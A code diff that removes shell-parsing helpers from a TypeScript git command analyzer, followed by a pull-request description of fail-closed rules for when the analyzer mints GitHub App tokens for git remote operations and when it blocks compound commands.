-    if (seg[start] !== 'git') return null
-    invocations.push({ args: seg.slice(start + 1), hasLeadingEnvAssignment })
-  }
-  return invocations
-}
-
-// Quote-aware: true if any shell-active metachar appears outside quotes EXCEPT
-// the `&&` operator (a lone `&` IS unsafe — backgrounding). `$`/backtick are
-// active inside double quotes too, so they trip even there; single-quoted
-// content is inert. Companion to containsShellActiveMetachar, which forbids ALL
-// of them (no `&&` exception) for the single-git path.
-function containsUnsafeMetacharOutsideAndAnd(command: string): boolean {
-  let quote: '"' | "'" | null = null
-  for (let i = 0; i < command.length; i++) {
-    const ch = command[i] as string
-    if (quote === "'") {
-      if (ch === "'") quote = null
-      continue
-    }
-    if (quote === '"') {
-      if (ch === '$' || ch === '`') return true
-      if (ch === '"') quote = null
-      continue
-    }
-    if (ch === "'" || ch === '"') {
-      quote = ch
-      continue
-    }
-    if (ch === '&') {
-      // `&&` is the one allowed composer; a single `&` is backgrounding.
-      if (command[i + 1] === '&') {
-        i += 1
-        continue
-      }
-      return true
-    }
-    if (SHELL_ACTIVE_METACHARS.has(ch)) return true
-  }
-  return false
-}
-
-function isCommandBoundaryBefore(tokens: readonly string[], index: number): boolean {
-  let cursor = index - 1
-  while (cursor >= 0) {
-    const prev = tokens[cursor]
-    if (prev === undefined) return false
-    if (prev === '&&' || prev === '||' || prev === '|' || prev === ';' || prev === '\n') return true
-    if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(prev)) {
-      cursor -= 1
-      continue
-    }
-    return false
-  }
-  return true
-}
-
-function containsShellActiveMetachar(command: string): boolean {
-  let quote: '"' | "'" | null = null
-  for (let i = 0; i < command.length; i++) {
-    const ch = command[i] as string
-    if (quote === "'") {
-      if (ch === "'") quote = null
-      continue
-    }
-    if (quote === '"') {
-      if (ch === '$' || ch === '`') return true
-      if (ch === '"') quote = null
-      continue
-    }
-    if (ch === "'" || ch === '"') {
-      quote = ch
-      continue
-    }
-    if (SHELL_ACTIVE_METACHARS.has(ch)) return true
-  }
-  return false
-}
-
-// unsafe=true when the command LOOKS like a `cd … && git …` but the cd target is
-// not a plain path we can faithfully turn into `git -C` (shell `~`/`-` expansion,
-// metachars). The caller then passes through rather than rewrite wrong cwd.
-type StrippedCd = { cdDir: string | null; rest: string; unsafe: boolean }
-
-// Accepts ONLY `cd <simple-path> && git …`. <simple-path> must be a single
-// token (optionally quoted) free of metachars and of a literal single quote
-// (rewriteCdToDashC single-quotes it), and not a shell-expanded `~`/`-`. A plain
-// command (no `cd` prefix) returns cdDir=null, unsafe=false.
-function stripSafeCdPrefix(command: string): StrippedCd {
-  const m = command.match(/^\s*cd\s+("[^"]*"|'[^']*'|[^\s'"]+)\s+&&\s+(git\b[\s\S]*)$/)
-  if (m === null) return { cdDir: null, rest: command, unsafe: false }
-  const rawDir = m[1] as string
-  const rest = m[2] as string
-  const dir = stripQuotes(rawDir)
-  const shellExpands = dir === '-' || dir === '~' || dir.startsWith('~/')
-  if (dir.includes('$') || dir.includes('`') || dir.includes("'") || /[;|&<>()]/.test(dir) || shellExpands) {
-    return { cdDir: null, rest: command, unsafe: true }
-  }
-  return { cdDir: dir, rest, unsafe: false }
-}
-
-function rewriteCdToDashC(dir: string, gitCommand: string): string {
-  return gitCommand.replace(/^git\b/, `git -C '${dir}'`)
-}
-
-function resolveCwd(base: string, dir: string | null): string {
-  if (dir === null || dir === '') return base
-  if (dir.startsWith('/')) return dir
-  return `${base.replace(/\/$/, '')}/${dir}`
-}
-
-function stripQuotes(token: string): string {
-  if (token.length < 2) return token
-  const first = token[0]
-  const last = token[token.length - 1]
-  if ((first === '"' && last === '"') || (first === "'" && last === "'")) return token.slice(1, -1)
-  return token
-}
-
-// Quote-aware; emits shell control operators as standalone tokens so
-// command-boundary detection works. Mirrors gh-command.ts's tokenize.
-function tokenize(command: string): string[] {
-  const tokens: string[] = []
-  let current = ''
-  let quote: '"' | "'" | null = null
-  let hasContent = false
-
-  const flush = (): void => {
-    if (hasContent) {
-      tokens.push(current)
-      current = ''
-      hasContent = false
-    }
-  }
-
-  for (let i = 0; i < command.length; i++) {
-    const ch = command[i]
-    if (ch === undefined) continue
-    if (quote !== null) {
-      if (ch === quote) quote = null
-      else current += ch
-      continue
-    }
-    if (ch === '"' || ch === "'") {
-      quote = ch
-      hasContent = true
-      continue
-    }
-    if (ch === ' ' || ch === '\t') {
-      flush()
-      continue
-    }
-    if (ch === '\n') {
-      flush()
-      tokens.push('\n')
-      continue
-    }
-    if (ch === ';' || ch === '|' || ch === '&') {
-      flush()
-      const next = command[i + 1]
-      if ((ch === '|' && next === '|') || (ch === '&' && next === '&')) {
-        tokens.push(ch + ch)
-        i += 1
-      } else {
-        tokens.push(ch)
-      }
-      continue
-    }
-    current += ch
-    hasContent = true
-  }
-  flush()
-  return tokens
+export async function resolveGhDefaultRepoFromCwd(cwd: string, resolvers: GitResolvers): Promise<string | null> {
+  const url = await resolvers.resolveRemoteUrl(cwd, 'origin', false)
+  return url === null ? null : parseGithubRepoFromGitUrl(url)
 }


### PR DESCRIPTION
## Background

The command analyzer accepts one safe prefix form, `cd <simple-path> && git <op>`, which it resolves to a working directory and can rewrite into a single `git -C <path> <op>` invocation eligible for a minted GitHub App token. Everything beyond that shape — a second command joined by `&&`, `&`, `;`, `|`, a subshell, or a brace group — used to fall straight through to an all-or-nothing pass-through, with no inspection of what the rest of the compound actually did.

That meant a compound with a local check followed by a remote GitHub operation ran unauthenticated: the remote operation never received the minted credential the safelist exists to provide, and nothing told the caller the compound shape itself was the problem.

## Summary

The analyzer now separates two allowlists that used to be conflated.

- Standalone minting (`decideStandalone`) is a positive allowlist: it only mints when a `git` invocation is completely recognized end to end — a known remote subcommand, a fully resolvable target, and no unrecognized/attached/incomplete option. Any unknown flag, an ill-formed `-C`, or an incomplete `fetch --multiple` (a target that never resolves) causes the whole invocation to be treated as unrecognized, and it runs tokenless.
- Compound evidence discovery (`discoverCompoundEvidence` / `extractEvidenceGitSegments` / `discoverInvocationEvidence`) is a separate, narrower scan over the rest of a compound command. It recognizes literal `git` invocations that start at a genuine command boundary (`&&`, `&`, `;`, `|`, newline, `(`, `{`, with an optional `cd`-resolved cwd immediately before), and resolves each one's remote target. If any of them resolves to a GitHub repo slug, the whole compound blocks with guidance to run local Git commands separately and retry the remote operation as a standalone `git -C <path> ...` command. Compounds that are local-only or target a non-GitHub remote (GitLab, Bitbucket, etc.) still pass through exactly as before.

One evidence-completeness detail is intentional and load-bearing: `fetch --multiple` with several remotes keeps every slug it can resolve even when another target in the same invocation doesn't resolve, and that partial evidence is enough to block a compound — better to fail closed than let an unauthenticated GitHub push slip through. But the same partial evidence is never enough to mint a token for a standalone command: `decideStandalone` checks evidence completeness before injecting, so an incomplete standalone `fetch --multiple` always runs tokenless.

Safe-`cd` handling got the same treatment. A recognized `cd <dir> && ...` prefix resolves a clean cwd and, when the rest is a single mintable invocation, rewrites the command to `git -C '<resolved-cwd>' ...` for injection. If that invocation already carries its own explicit `-C` (redundant or conflicting with the resolved cwd), the analyzer blocks instead of guessing which one wins, and points the caller at a standalone `git -C <path> ...` form. When the rest of a safe-`cd` prefix isn't a single invocation, it's evaluated as a compound against the resolved cwd, following the same evidence-discovery rules as any other compound.

The established `git clone <github-url> <dest> && <tail>` exception is untouched by this change: the clone head is still rebuilt from a small dedicated grammar, and the tail still only runs after `exec`ing into a shell with every token-bearing env var stripped.

## Security/compatibility

- Fail-closed by construction: anything the analyzer doesn't fully recognize — unsupported syntax, an unknown option, an incomplete target — runs without a token rather than risk minting on ambiguous input. This is intentionally not a full Bash or Git grammar; unsupported syntax stays tokenless rather than being force-parsed.
- No new general-purpose shell parsing or credential-execution path was added; detection stays scoped to identifying GitHub remote operations at literal `git` boundaries.
- Backward compatible for the common cases: standalone `git <remote-op>` and `cd <path> && git <remote-op>` keep minting and rewriting exactly as before, and compounds with only local or non-GitHub remote operations keep passing through unchanged.

## What this does NOT do

- Does not implement full Bash/Git command-line grammar. Compound evidence discovery recognizes only literal `git` at a handful of review-relevant boundaries plus narrow redirection/wrapper prefixes; anything it doesn't recognize is a miss that runs tokenless, not a parse the analyzer treats as authoritative.
- Does not change the existing single-invocation path (`git <remote-op>` or `cd <path> && git <remote-op>` rewritten to `git -C <path> <remote-op>`), which behaves as before.
- Does not replace or touch the clone-then-inspect exception (`git clone <github-url> <dest> && <tail>`), which still runs through its own token-stripped path.
- Does not let partial or incomplete evidence mint a token under any circumstance — it can only ever justify blocking a compound.

## Review notes

Load-bearing: `discoverCompoundEvidence`, `extractEvidenceGitSegments`, and `discoverInvocationEvidence` in `git-command.ts`, plus the dashed-`-C` count check in the safe-`cd` path that blocks (rather than silently overwrites) a cd-prefixed invocation that already carries its own `-C`.

Invariant to verify: a compound blocks whenever it contains a resolvable GitHub remote operation at a recognized boundary, regardless of which operator introduces it (`&&`, `&`, `;`, `|`, `(...)`, `{...}`), while purely local compounds and non-GitHub remotes keep passing through unchanged — and no amount of partial evidence ever mints a token for a standalone invocation.

The reviewer initially requested changes, flagging bypasses and a regression in the pass-through contract for grouped commands. The current revision addresses all of those: the reviewer confirmed every prior blocker is resolved, that later GitHub operations and partial multi-remote evidence are correctly retained for blocking, that the boundary change preserves pass-through for grouped local/non-GitHub commands, and that the added regression coverage exercises those cases. The PR is approved with all review threads resolved.

## Verification

- `bun run test` — 12,608 pass, 31 skip, 0 fail
- Targeted analyzer tests — 186 pass
- `github-cli-auth` package tests — 505 pass
- `bun run lint` — 0 errors, pre-existing warnings only
- `bun typecheck` — pass
- `bun run format:check` — pass
- GitHub Actions: Linux, Windows, and flake-guard checks — all pass
